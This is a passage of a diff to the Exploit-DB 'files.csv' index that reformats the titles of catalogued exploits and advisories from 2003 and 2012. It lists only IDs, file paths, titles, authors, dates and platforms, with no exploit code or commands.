(1)",2003-05-26,jlanthea,linux,local,0 22644,platforms/linux/local/22644.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (2)",2003-05-26,jsk,linux,local,0 22645,platforms/linux/local/22645.c,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (3)",2003-05-26,"Julien L",linux,local,0 -22646,platforms/unix/remote/22646.txt,"Vignette 4.x/5.0 Memory Disclosure",2003-05-26,S21Sec,unix,remote,0 +22646,platforms/unix/remote/22646.txt,"Vignette 4.x/5.0 - Memory Disclosure",2003-05-26,S21Sec,unix,remote,0 22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0 22648,platforms/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting",2003-05-26,"Ramon Pinuaga Cascales",unix,remote,0 -22649,platforms/multiple/remote/22649.txt,"P-News 1.16 Administrative Account Creation",2003-05-24,"Peter Winter-Smith",multiple,remote,0 +22649,platforms/multiple/remote/22649.txt,"P-News 1.16 - Administrative Account Creation",2003-05-24,"Peter Winter-Smith",multiple,remote,0 22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 (Zps.exe) - Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 -22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 +22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 -22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 +22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash PoC",2012-11-12,coolkaveh,windows,dos,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,Metasploit,multiple,remote,0 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow (1)",2003-05-26,wsxz,linux,remote,0 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow (2)",2003-05-26,jsk,linux,remote,0 22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0 -22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local,0 -22662,platforms/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,multiple,remote,0 +22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 - Command Line Argument Buffer Overflow",2003-05-27,"Gino Thomas",freebsd,local,0 +22662,platforms/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,multiple,remote,0 22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Elevation",2003-05-27,"Peter Winter-Smith",php,webapps,0 22664,platforms/windows/remote/22664.txt,"Sun ONE Application Server 7.0 Source Disclosure",2003-05-27,"SPI Labs",windows,remote,0 -22665,platforms/windows/remote/22665.txt,"Sun ONE Application Server 7.0 Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote,0 +22665,platforms/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote,0 22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0 @@ -19918,12 +19918,12 @@ id,file,description,date,author,platform,type,port 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 URI Parameter File Disclosure",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 philboard_admin.ASP Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 -22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 Path Disclosure",2003-05-29,JeiAr,windows,remote,0 +22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Path Disclosure",2003-05-29,JeiAr,windows,remote,0 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 -22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 Crash PoC",2012-11-13,coolkaveh,windows,dos,0 +22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash PoC",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView - .TIF Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 @@ -19958,8 +19958,8 @@ id,file,description,date,author,platform,type,port 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 -22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0 @@ -19985,12 +19985,12 @@ id,file,description,date,author,platform,type,port 22739,platforms/hardware/dos/22739.py,"Broadcom DoS on BCM4325 and BCM4329 Devices",2012-11-15,CoreLabs,hardware,dos,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,"cr4wl3r ",php,webapps,0 -22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 Admin.CGI Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 -22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 +22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.CGI Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 +22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 22745,platforms/linux/local/22745.c,"Zblast 1.2 - Local Username Buffer Overrun",2003-06-06,V9,linux,local,0 22746,platforms/asp/webapps/22746.txt,"MaxWebPortal 1.30 - search.asp Search Parameter XSS",2003-06-06,JeiAr,asp,webapps,0 22747,platforms/asp/webapps/22747.txt,"MaxWebPortal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 -22748,platforms/linux/local/22748.c,"Xaos 3.0 Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 +22748,platforms/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0_eDirectory 8.7 HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - Index.php Remote File Inclusion",2003-06-06,farking,php,webapps,0 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x_opera 6/7 Timed Document.Write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0 @@ -20006,7 +20006,7 @@ id,file,description,date,author,platform,type,port 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22829,platforms/php/webapps/22829.txt,"webid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 -22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 +22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - User.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",linux,local,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 @@ -20032,7 +20032,7 @@ id,file,description,date,author,platform,type,port 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 -22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 +22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11",2003-06-17,dr_insane,php,webapps,0 22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal",2003-06-18,dr_insane,windows,remote,0 @@ -20041,7 +20041,7 @@ id,file,description,date,author,platform,type,port 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 @@ -20051,7 +20051,7 @@ id,file,description,date,author,platform,type,port 22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - /lib/ Multiple Script Direct Request Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 +22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 @@ -20064,7 +20064,7 @@ id,file,description,date,author,platform,type,port 22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 buddy.php action Parameter XSS",2003-06-23,"Knight Commander",php,webapps,0 22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 -22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0 +22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 @@ -20077,19 +20077,19 @@ id,file,description,date,author,platform,type,port 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0 22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 -22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 +22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept",2003-06-26,IhaQueR,linux,local,0 22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.php File Deletion",2003-06-26,leseulfrog,php,webapps,0 -22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0 +22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 - HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0 22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,windows,dos,0 22845,platforms/php/webapps/22845.txt,"PABox 1.6 Password Reset",2003-06-30,silentscripter,php,webapps,0 -22846,platforms/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 WWWLaunchNetscape Buffer Overflow",2003-07-01,"Paul Szabo",linux,dos,0 +22846,platforms/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 - WWWLaunchNetscape Buffer Overflow",2003-07-01,"Paul Szabo",linux,dos,0 22847,platforms/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions",2003-07-01,"Larry W. Cashdollar",linux,local,0 -22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 Format String",2003-07-01,V9,linux,remote,0 +22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0 22849,platforms/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 -22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 Crash PoC",2012-11-20,coolkaveh,windows,dos,0 +22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 - Crash PoC",2012-11-20,coolkaveh,windows,dos,0 22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 22853,platforms/php/webapps/22853.txt,"WordPress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 @@ -20101,8 +20101,8 @@ id,file,description,date,author,platform,type,port 22859,platforms/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos,0 22860,platforms/linux/local/22860.c,"GNU Chess 5.0 - Local Buffer Overflow",2003-07-03,ace,linux,local,0 22861,platforms/linux/local/22861.c,"GNU AN Local Command Line Option Buffer Overflow",2003-07-03,ace,linux,local,0 -22862,platforms/linux/local/22862.c,"ISDNRep 4.56 Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local,0 -22863,platforms/linux/local/22863.c,"ISDNRep 4.56 Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0 +22862,platforms/linux/local/22862.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (1)",2003-07-03,ace,linux,local,0 +22863,platforms/linux/local/22863.c,"ISDNRep 4.56 - Command Line Argument Local Buffer Overflow (2)",2003-07-04,snooq,linux,local,0 22864,platforms/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 Custva.ASP SQL Injection",2003-07-04,Bosen,asp,webapps,0 22865,platforms/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - Login.ASP SQL Injection",2003-07-04,Bosen,asp,webapps,0 22866,platforms/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 MSG.ASP Cross-Site Scripting",2003-07-05,atomix,asp,webapps,0 @@ -20114,10 +20114,10 @@ id,file,description,date,author,platform,type,port 22872,platforms/windows/remote/22872.txt,"IglooFTP PRO 3.8 - Multiple Buffer Overflow Vulnerabilities (2)",2003-07-07,"Peter Winter-Smith",windows,remote,0 22873,platforms/linux/remote/22873.c,"GKrellM Mailwatch Plugin 2.4.1/2.4.2 From Header Remote Buffer Overflow",2003-07-06,isox,linux,remote,0 22874,platforms/php/webapps/22874.txt,"CPanel 5.0/5.3/6.x - Admin Interface HTML Injection",2003-07-07,"Ory Segal",php,webapps,0 -22875,platforms/windows/dos/22875.txt,"MyServer 0.4.2 Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos,0 +22875,platforms/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos,0 22876,platforms/hardware/dos/22876.txt,"Canon GP300 - Remote Malformed HTTP Get Denial of Service",2003-07-07,"DOUHINE Davy",hardware,dos,0 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0 -22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 +22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 - JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0 @@ -20137,7 +20137,7 @@ id,file,description,date,author,platform,type,port 22892,platforms/windows/remote/22892.txt,"Mabry Software HTTPServer/X 1.0 0.047 - File Disclosure",2003-07-11,dr_insane,windows,remote,0 22893,platforms/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote,0 22894,platforms/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x - GSisText Buffer Overflow",2003-07-11,V9,linux,remote,0 -22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0 +22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0 22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0 22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Request Buffer Overflow",2003-07-07,posidron,linux,dos,0 22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router Information Disclosure",2003-07-14,cw,hardware,remote,0 @@ -20160,19 +20160,19 @@ id,file,description,date,author,platform,type,port 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote,0 22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 Plain Text Password",2003-07-22,hanez,windows,local,0 -22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 +22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 -22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 +22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0 22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution",2003-07-24,"Martin Eiszner",php,webapps,0 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 DB.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000_MSDE Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0 -22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 +22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 22959,platforms/windows/remote/22959.txt,"Microsoft Outlook Express 5/6 Script Execution Weakness",2003-07-25,http-equiv,windows,remote,0 -22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 +22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String",2003-07-28,lucipher,unix,remote,0 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow",2003-07-28,c0wboy,linux,local,0 @@ -20200,14 +20200,14 @@ id,file,description,date,author,platform,type,port 23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 -23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure",2003-08-11,G00db0y,php,webapps,0 +23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 - Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting",2003-08-11,G00db0y,php,webapps,0 -23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 Path Disclosure",2003-08-11,G00db0y,php,webapps,0 +23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 - Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module 